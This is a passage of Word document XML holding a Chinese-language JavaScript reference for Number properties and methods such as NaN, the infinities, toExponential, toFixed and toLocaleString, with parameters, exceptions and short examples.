    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>概要</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Number.NaN</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Number.NaN</w:t>
      </w:r>
      <w:r>
        <w:t>是一个特殊的值，表示某些数学操作（如对负数取平方根）的结果不是一个数字。</w:t>
      </w:r>
      <w:r>
        <w:t>parseInt()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>parseFloat()</w:t>
      </w:r>
      <w:r>
        <w:t>在不能解析指定的字符串时也会返回这个值，类似地，可以在那些正常情况下返回有效数字的函数中返回</w:t>
      </w:r>
      <w:r>
        <w:t>Number.NaN</w:t>
      </w:r>
      <w:r>
        <w:t>来报告一个错误。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>将</w:t>
      </w:r>
      <w:r>
        <w:t>Number.NaN</w:t>
      </w:r>
      <w:r>
        <w:t>值输出为</w:t>
      </w:r>
      <w:r>
        <w:t>NaN</w:t>
      </w:r>
      <w:r>
        <w:t>。注意，</w:t>
      </w:r>
      <w:r>
        <w:t>NaN</w:t>
      </w:r>
      <w:r>
        <w:t>值与任意其他数字总是不等，包括</w:t>
      </w:r>
      <w:r>
        <w:t>NaN</w:t>
      </w:r>
      <w:r>
        <w:t>本身。因此，不能通过与</w:t>
      </w:r>
      <w:r>
        <w:t>Number.NaN</w:t>
      </w:r>
      <w:r>
        <w:t>比较的方法来检查某个值是否为非数字值，而应该使用</w:t>
      </w:r>
      <w:r>
        <w:t>isNaN()</w:t>
      </w:r>
      <w:r>
        <w:t>函数代替。在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ECMAScript </w:t>
      </w:r>
      <w:r>
        <w:t>v1</w:t>
      </w:r>
      <w:r>
        <w:t>及后续的版本中，也可以使用预定义的全局属性</w:t>
      </w:r>
      <w:r>
        <w:t>NaN</w:t>
      </w:r>
      <w:r>
        <w:t>来代替</w:t>
      </w:r>
      <w:r>
        <w:t>Number.NaN</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isNaN()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>NaN</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="712" w:name="Number_NEGATIVE_INFINITY"/>
      <w:r>
        <w:t>Number.NEGATIVE_INFINITY</w:t>
      </w:r>
      <w:bookmarkEnd w:id="712"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>负无穷</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>概要</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Number.NEGATIVE_INFINITY</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Number.NEGATIVE_INFINITY</w:t>
      </w:r>
      <w:r>
        <w:t>是一个特殊的数值，当一个算术操作或数学函数产生了一个绝对值比</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中能表示的最大的数还要大（也就是说，比</w:t>
      </w:r>
      <w:r>
        <w:t>-Number.MAX_VALUE</w:t>
      </w:r>
      <w:r>
        <w:t>还要小）的负数时返回该值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>将</w:t>
      </w:r>
      <w:r>
        <w:t>NEGATIVE_INFINT</w:t>
      </w:r>
      <w:r>
        <w:t>Y</w:t>
      </w:r>
      <w:r>
        <w:t>值显示为</w:t>
      </w:r>
      <w:r>
        <w:t>-Infinity</w:t>
      </w:r>
      <w:r>
        <w:t>。这个值在数学上表现得就像无穷大一样，例如，任何数字乘以无穷大仍然是无穷大，同时任何数字除以无穷大将得到</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>。在</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript v1</w:t>
      </w:r>
      <w:r>
        <w:t>及之后的版本中，也可以使用</w:t>
      </w:r>
      <w:r>
        <w:t>-Infinity</w:t>
      </w:r>
      <w:r>
        <w:t>来代替</w:t>
      </w:r>
      <w:r>
        <w:t>Number.NEGATIVE_INFINITY</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Infinity</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>isFinite()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="713" w:name="Number_POSITIVE_INFINITY"/>
      <w:r>
        <w:t>Number.POSITIVE_INFINITY</w:t>
      </w:r>
      <w:bookmarkEnd w:id="713"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>无穷大</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>概要</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Number.POSITIVE_INFINITY</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Number.POSITIVE_INFINITY</w:t>
      </w:r>
      <w:r>
        <w:t>是一个特殊的数值，当一个算术操作或数学函数产生了一个比</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中所能表示的最大的数还要大（也就是说，比</w:t>
      </w:r>
      <w:r>
        <w:t>Number.MAX_VALUE</w:t>
      </w:r>
      <w:r>
        <w:t>还要大）的值时返回该值。注意，如果数字</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>下溢</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>，或者说比</w:t>
      </w:r>
      <w:r>
        <w:t>Number.MIN_VALUE</w:t>
      </w:r>
      <w:r>
        <w:t>还要小时，</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>将把它转换为</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>将</w:t>
      </w:r>
      <w:r>
        <w:t>POSITIVE_INFINITY</w:t>
      </w:r>
      <w:r>
        <w:t>显示为</w:t>
      </w:r>
      <w:r>
        <w:t>Infinity</w:t>
      </w:r>
      <w:r>
        <w:t>。这个值在数学上表现得就像无穷大一样，例如，任何数字乘以无穷大仍然是无穷大，同时任何数字除以无穷大将得到</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>。在</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript v1</w:t>
      </w:r>
      <w:r>
        <w:t>及之后的版本中，也可以使用预定义的全局属性</w:t>
      </w:r>
      <w:r>
        <w:t>Infinity</w:t>
      </w:r>
      <w:r>
        <w:t>来代替</w:t>
      </w:r>
      <w:r>
        <w:t>Number.POSITIVE_INFINITY</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Infinity</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>isFinite()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="714" w:name="Number_toExponential__"/>
      <w:r>
        <w:t>Number.toExponential()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="714"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>使用指数记数法格式化一个数字</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>概要</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>number.toExponential(digits)</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digits</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>小数点之后出现的数字的数目。值可能在</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>～</w:t>
      </w:r>
      <w:r>
        <w:t>20</w:t>
      </w:r>
      <w:r>
        <w:t>之间，包括</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>及</w:t>
      </w:r>
      <w:r>
        <w:t>20</w:t>
      </w:r>
      <w:r>
        <w:t>。不同的实现环境可能会支持范围更大的值。如果省略这个参数，则需要多少数字将显示多少数字。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>以指数记数法表示的一个数字的字符串格式，小数点前有一个数字，小数点后面有</w:t>
      </w:r>
      <w:r>
        <w:t>digits</w:t>
      </w:r>
      <w:r>
        <w:t>个数字。数字的小数部分将根据需要四舍五入或补</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>，以便与指定的长度相符。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>异常</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>RangeError</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>digits</w:t>
      </w:r>
      <w:r>
        <w:t>参数太小或太大。</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>～</w:t>
      </w:r>
      <w:r>
        <w:t>20</w:t>
      </w:r>
      <w:r>
        <w:t>之间的值（包括</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>20</w:t>
      </w:r>
      <w:r>
        <w:t>）不会产生</w:t>
      </w:r>
      <w:r>
        <w:t>RangeError</w:t>
      </w:r>
      <w:r>
        <w:t>。不过，不同的实现环境可能会支持更大或更小的值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>TypeError</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个方法在一个非</w:t>
      </w:r>
      <w:r>
        <w:t>Number</w:t>
      </w:r>
      <w:r>
        <w:t>对象上调用。</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n=12345.6789;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>n.toExponential(1);//</w:t>
      </w:r>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:t>1.2e+4</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>n.toExponential(5);//</w:t>
      </w:r>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:t>1.23457e+4</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>n.toExponential(10);//</w:t>
      </w:r>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:t>1.2345678900e+4</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>n.toExponential();//</w:t>
      </w:r>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:t>1.23456789e+4</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Number.toFixed()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Number.toLocaleString()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Number.toPrecision()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Number.toString()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="715" w:name="Number_toFixed__"/>
      <w:r>
        <w:t>Number.toFixed()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="715"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>使用定点记数法格式化一个数字</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>概要</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>number.toFixed(digits)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>参数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>digits</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>小数点之后要显示的数字的数量，值可能在</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>～</w:t>
      </w:r>
      <w:r>
        <w:t>20</w:t>
      </w:r>
      <w:r>
        <w:t>之间，包括</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>20</w:t>
      </w:r>
      <w:r>
        <w:t>，不同的实现环境可能支持更大或更小的值。如果省略这个参数，则相当于传入了</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>。</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一个数字的字符串格式，不使用指数记数法，在小数点后有指定的</w:t>
      </w:r>
      <w:r>
        <w:t>digits</w:t>
      </w:r>
      <w:r>
        <w:t>个数字。根据需要，这个数字将四舍五入，或者小数部分补</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>，以便符合指定的长度。如果数字大于</w:t>
      </w:r>
      <w:r>
        <w:t>1e+21</w:t>
      </w:r>
      <w:r>
        <w:t>，则这个方法将简单地调用</w:t>
      </w:r>
      <w:r>
        <w:t>Number.toString()</w:t>
      </w:r>
      <w:r>
        <w:t>并返回一个指数记数法格式的字符串。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>异常</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>RangeError</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>digits</w:t>
      </w:r>
      <w:r>
        <w:t>参数太小或太大。</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>～</w:t>
      </w:r>
      <w:r>
        <w:t>20</w:t>
      </w:r>
      <w:r>
        <w:t>之间的值（包括</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>20</w:t>
      </w:r>
      <w:r>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:t>不会产生</w:t>
      </w:r>
      <w:r>
        <w:t>RangeError</w:t>
      </w:r>
      <w:r>
        <w:t>。不过，不同的实现环境可能会支持更大或更小的值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>TypeError</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个方法在一个非</w:t>
      </w:r>
      <w:r>
        <w:t>Number</w:t>
      </w:r>
      <w:r>
        <w:t>对象上调用。</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n=12345.6789;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>n.toFixed();//</w:t>
      </w:r>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:t>12346</w:t>
      </w:r>
      <w:r>
        <w:t>：注意四舍五入，没有小数部分</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>n.toFixed(1);//</w:t>
      </w:r>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:t>12345.7</w:t>
      </w:r>
      <w:r>
        <w:t>：注意四舍五入</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>n.toFixed(6);//</w:t>
      </w:r>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:t>12345.678900</w:t>
      </w:r>
      <w:r>
        <w:t>：注意末尾添加的</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>(1.23e+20).toFixed(2);//</w:t>
      </w:r>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:t>123000000000000000000.00</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>(1.23e</w:t>
      </w:r>
      <w:r>
        <w:t>-10).toFixed(2)//</w:t>
      </w:r>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:t>0.00</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pP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Number.toExponential()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Number.toLocaleString()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Number.toPrecision()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Number.toString()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="716" w:name="Number_toLocaleString__"/>
      <w:r>
        <w:t>Number.toLocaleString()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="716"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>将一个数字转换为本地格式的字符串</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>概要</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>number.toLocaleString()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>根据本地惯例格式化当前数字为一个字符串，与具体的实现有关，例如可能会影响小数点使用的标点符号或者千位分隔符。</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这个方法在一个非</w:t>
      </w:r>
      <w:r>
        <w:t>Number</w:t>
      </w:r>
      <w:r>
        <w:t>对象上调用。</w:t>
      </w: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Number.toExponential()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Number.toFixed()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Number.toPrecision()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Number.toString()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="717" w:name="Number_toPrecision__"/>
      <w:r>
        <w:t>Number.toPrecision()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="717"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>格式化一个数字的有效数字</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>概要</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>number.toPrecision(precision)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>参数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>precision</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回的字符串中包含的有效数字位数。值可能在</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>～</w:t>
      </w:r>
      <w:r>
